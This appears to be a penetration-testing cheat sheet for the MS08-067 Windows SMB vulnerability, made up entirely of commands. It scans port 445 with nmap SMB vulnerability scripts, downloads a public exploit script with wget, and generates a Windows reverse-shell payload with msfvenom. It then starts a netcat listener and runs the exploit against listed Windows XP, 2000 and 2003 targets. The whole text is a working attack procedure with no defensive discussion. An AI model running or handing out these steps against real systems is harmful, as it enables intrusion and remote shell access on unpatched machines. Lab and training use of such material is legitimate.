Detection
IP=x.x.x.x
nmap -Pn -sV -p 445 --script=smb-vuln* -d $IP
nmap -Pn -sV -p 445 --script=smb-vuln* --script-args=smbdomain=example,smbusername=user1,smbpassword=mypass -d $IP
Exploit
Download the exploit
wget https://raw.githubusercontent.com/jivoi/pentest/master/exploit_win/ms08-067.py
Generate the payload
msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f py -v shellcode -a x86 --platform windows
Replace the shellcode in exploit
shellcode = (
...
)
Start a listener
sudo nc -nlvp 443
Run the exploit
chmod u+x ms08-067.py
Windows XP SP0/SP1 Universal, port 445
./ms08-067.py $IP 1 445
Windows 2000 Universal, port 139 (445 could also be used)
./ms08-067.py $IP 2 139
./ms08-067.py $IP 2 445
Windows 2003 SP0 Universal
./ms08-067.py $IP 3 445
Windows 2003 SP1 English
./ms08-067.py $IP 4 445
Windows XP SP3 French (NX)
./ms08-067.py $IP 5 445
Windows XP SP3 English (NX)
./ms08-067.py $IP 6 445
Windows XP SP3 English (AlwaysOn NX)
./ms08-067.py $IP 7 445
